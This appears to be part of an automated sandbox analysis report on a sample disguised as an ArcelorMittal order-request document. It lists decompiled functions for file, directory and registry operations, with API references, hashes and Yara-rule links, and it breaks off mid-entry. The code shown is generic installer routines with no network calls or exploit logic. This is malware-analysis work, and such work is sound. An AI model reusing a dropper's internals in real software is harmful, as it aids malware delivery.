                                                • Opcode ID: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                                                • Instruction ID: a29eaa7254a97888a18cbfd792fe15e84c6d283973f4e4682f27fdddc38ff468
                                                • Opcode Fuzzy Hash: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                                                • Instruction Fuzzy Hash: 71D09E71654601AFEF098F20DE16F2E7AA2FB84B00F11562CB682940E0DAB158199B15
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405BE2 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00405BE2(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}





                                                0x00405be7
                                                0x00405bed
                                                0x00405bf2
                                                0x00405bfb
                                                0x00405bfb
                                                0x00405c04

                                                APIs
                                                • GetFileAttributesW.KERNELBASE(?,?,004057E7,?,?,00000000,004059BD,?,?,?,?), ref: 00405BE7
                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405BFB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                                                • Instruction ID: 2c4e6be97b113ceed9239146329651d13cb313475d1ce615590156906e373da3
                                                • Opcode Fuzzy Hash: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
                                                • Instruction Fuzzy Hash: 07D01272504520AFC2102738EF0C89BBF55EB543717064B35FAF9A22F0CB314C56DA98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004056DD Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E004056DD(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                0x004056e3
                                                0x004056eb
                                                0x00000000
                                                0x004056f1
                                                0x00000000

                                                APIs
                                                • CreateDirectoryW.KERNELBASE(?,00000000,00403270,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004034A9), ref: 004056E3
                                                • GetLastError.KERNEL32 ref: 004056F1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: CreateDirectoryErrorLast
                                                • String ID:
                                                • API String ID: 1375471231-0
                                                • Opcode ID: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
                                                • Instruction ID: 43b8cc017be4ea794887f60b7ff78796ccb4e437ad0dace2cbd4982aac0f1f36
                                                • Opcode Fuzzy Hash: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
                                                • Instruction Fuzzy Hash: 02C04C30614602DBD6105B20DE08B177950EB54781F518839614AE11A0DA768455FF2D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00401673 Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 70%
                                                			E00401673() {
				int _t7;
				void* _t13;
				void* _t15;
				void* _t20;

				_t18 = E00402BBF(0xffffffd0);
				_t16 = E00402BBF(0xffffffdf);
				E00402BBF(0x13);
				_t7 = MoveFileW(_t4, _t5); // executed
				if(_t7 == 0) {
					if( *((intOrPtr*)(_t20 - 0x24)) == _t13 || E00406375(_t18) == 0) {
						 *((intOrPtr*)(_t20 - 4)) = 1;
					} else {
						E00405ED3(_t15, _t18, _t16);
						_push(0xffffffe4);
						goto L5;
					}
				} else {
					_push(0xffffffe3);
					L5:
					E00401423();
				}
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t20 - 4));
				return 0;
			}







                                                0x0040167c
                                                0x00401685
                                                0x00401687
                                                0x0040168e
                                                0x00401696
                                                0x004016a2
                                                0x0040281e
                                                0x004016b6
                                                0x004016b8
                                                0x004016bd
                                                0x00000000
                                                0x004016bd
                                                0x00401698
                                                0x00401698
                                                0x004021dc
                                                0x004021dc
                                                0x004021dc
                                                0x00402a4f
                                                0x00402a5b

                                                APIs
                                                • MoveFileW.KERNEL32(00000000,00000000), ref: 0040168E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: FileMove
                                                • String ID:
                                                • API String ID: 3562171763-0
                                                • Opcode ID: c3778459728d826bbdac694ea121f0bef50cf8d752e3b99a0464db8e1b3f2e90
                                                • Instruction ID: 39a705c871337a298e289750b84dd0ffd285fe21b7fc35a555db8342d30c8454
                                                • Opcode Fuzzy Hash: c3778459728d826bbdac694ea121f0bef50cf8d752e3b99a0464db8e1b3f2e90
                                                • Instruction Fuzzy Hash: 38F0B431604114A7CB10BBBA4F0DD5F32A59B82338B24467BF911F21D5DAFC8A4186AF
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00402786 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 34%
                                                			E00402786(void* __eflags) {
				long _t7;
				long _t9;
				LONG* _t11;
				void* _t13;
				void* _t15;
				void* _t17;

				_push(ds);
				if(__eflags != 0) {
					_t7 = E00402BA2(2);
					_t9 = SetFilePointer(E00405F92(_t13, _t15), _t7, _t11,  *(_t17 - 0x20)); // executed
					if( *((intOrPtr*)(_t17 - 0x28)) >= _t11) {
						_push(_t9);
						_push( *((intOrPtr*)(_t17 - 0x10)));
						E00405F79();
					}
				}
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}









                                                0x00402786
                                                0x00402787
                                                0x00402793
                                                0x004027a0
                                                0x004027a9
                                                0x004029ee
                                                0x004029ef
                                                0x004029f2
                                                0x004029f2
                                                0x004027a9
                                                0x00402a4f
                                                0x00402a5b

                                                APIs
                                                • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 004027A0
                                                  • Part of subcall function 00405F79: wsprintfW.USER32 ref: 00405F86
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: FilePointerwsprintf
                                                • String ID:
                                                • API String ID: 327478801-0
                                                • Opcode ID: e6b1ca666dcbd82e8a1de2ea37f9ef81104a41e8613c43d0bfa43493d1c7e0f2
                                                • Instruction ID: 6e13d26e98101992f91f16a3b10818fa49d07bfc2575382a514d36e2453af549
                                                • Opcode Fuzzy Hash: e6b1ca666dcbd82e8a1de2ea37f9ef81104a41e8613c43d0bfa43493d1c7e0f2
                                                • Instruction Fuzzy Hash: 33E04F71701518AFDB41AFA59E4ACBF776AEB40328B14843BF105F00E1CABD8C119A2E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040172D Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0040172D() {
				long _t5;
				WCHAR* _t8;
				WCHAR* _t12;
				void* _t14;
				long _t17;

				_t5 = SearchPathW(_t8, E00402BBF(0xffffffff), _t8, 0x400, _t12, _t14 + 8); // executed
				_t17 = _t5;
				if(_t17 == 0) {
					 *((intOrPtr*)(_t14 - 4)) = 1;
					 *_t12 = _t8;
				}
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t14 - 4));
				return 0;
			}








                                                0x00401741
                                                0x00401747
                                                0x00401749
                                                0x004027ec
                                                0x004027f3
                                                0x004027f3
                                                0x00402a4f
                                                0x00402a5b

                                                APIs
                                                • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401741
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: PathSearch
                                                • String ID:
                                                • API String ID: 2203818243-0
                                                • Opcode ID: 6c3bf02cedd953c02cf191020c70236bab39714c6f7018b829d4b0d23e56155e
                                                • Instruction ID: b70941bc7738bb9b0414a64e3b7b2b1df016234940ef209bc10d8c2c44c885ef
                                                • Opcode Fuzzy Hash: 6c3bf02cedd953c02cf191020c70236bab39714c6f7018b829d4b0d23e56155e
                                                • Instruction Fuzzy Hash: 81E08071300100ABD750CFA4DE49AAA776CDF40378F20417BF515E61D1E6B49A41972D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00402CC9 Relevance: 1.5, APIs: 1, Instructions: 22registryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 75%
                                                			E00402CC9(void* __eflags, void* _a4) {
				short* _t8;
				intOrPtr _t9;
				signed int _t11;

				_t8 = E00402BBF(0x22);
				_t9 =  *0x40cdc8; // 0x2effc5c
				_t11 = RegOpenKeyExW(E00402CB4( *((intOrPtr*)(_t9 + 4))), _t8, 0,  *0x7a8af0 | _a4,  &_a4); // executed
				asm("sbb eax, eax");
				return  !( ~_t11) & _a4;
			}






                                                0x00402cdd
                                                0x00402ce3
                                                0x00402cf1
                                                0x00402cf9
                                                0x00402d01

                                                APIs
                                                • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?,?,0040232B,00000002), ref: 00402CF1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: Open
                                                • String ID:
                                                • API String ID: 71445658-0
                                                • Opcode ID: 9da2ebaaada2ed444504018bdaab7b440fc23c9bd071d66725cd28ab7958d0a8
                                                • Instruction ID: 818ee9457f1dd57358e842bea021a20957f37b1b048482a93cb04bcf3cfa71ad
                                                • Opcode Fuzzy Hash: 9da2ebaaada2ed444504018bdaab7b440fc23c9bd071d66725cd28ab7958d0a8
                                                • Instruction Fuzzy Hash: DBE08676250108BFDB00DFA8DE47FD537ECAB44700F008021BA08D70D1C774E5408768
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405C8A Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00405C8A(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                0x00405c8e
                                                0x00405c9e
                                                0x00405ca6
                                                0x00000000
                                                0x00405cad
                                                0x00000000
                                                0x00405caf

                                                APIs
                                                • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403232,00000000,00000000,00403079,000000FF,00000004,00000000,00000000,00000000), ref: 00405C9E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
                                                • Instruction ID: 79895e6dacc008681341a1447f190e2469ffe8152373b8c922f561a90a2bf5e3
                                                • Opcode Fuzzy Hash: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
                                                • Instruction Fuzzy Hash: FCE08C3220921AABEF11AF908C00EEB3B6CFF04360F004832F910E7240D230E8218BA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405CB9 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00405CB9(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}





                                                0x00405cbd
                                                0x00405ccd
                                                0x00405cd5
                                                0x00000000
                                                0x00405cdc
                                                0x00000000
                                                0x00405cde

                                                APIs
                                                • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004031E8,00000000,0078B6F8,000000FF,0078B6F8,000000FF,000000FF,00000004,00000000), ref: 00405CCD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: FileWrite
                                                • String ID:
                                                • API String ID: 3934441357-0
                                                • Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                • Instruction ID: 3bcd5730ec7463d7366e74611f21d1d4cfbccb505e455464be6c792c77663440
                                                • Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                • Instruction Fuzzy Hash: ABE0EC3225465AABEF109E559C00EEB7B6CFB057A0F044837F915E3150D631E921EBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040159B Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0040159B() {
				int _t5;
				void* _t11;
				int _t14;

				_t5 = SetFileAttributesW(E00402BBF(0xfffffff0),  *(_t11 - 0x28)); // executed
				_t14 = _t5;
				if(_t14 == 0) {
					 *((intOrPtr*)(_t11 - 4)) = 1;
				}
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t11 - 4));
				return 0;
			}






                                                0x004015a6
                                                0x004015ac
                                                0x004015ae
                                                0x0040281e
                                                0x0040281e
                                                0x00402a4f
                                                0x00402a5b

                                                APIs
                                                • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: 627040d589bdeab8fa2eb58a529c745ef8675100561ec111daf7d71d3d3e8b9e
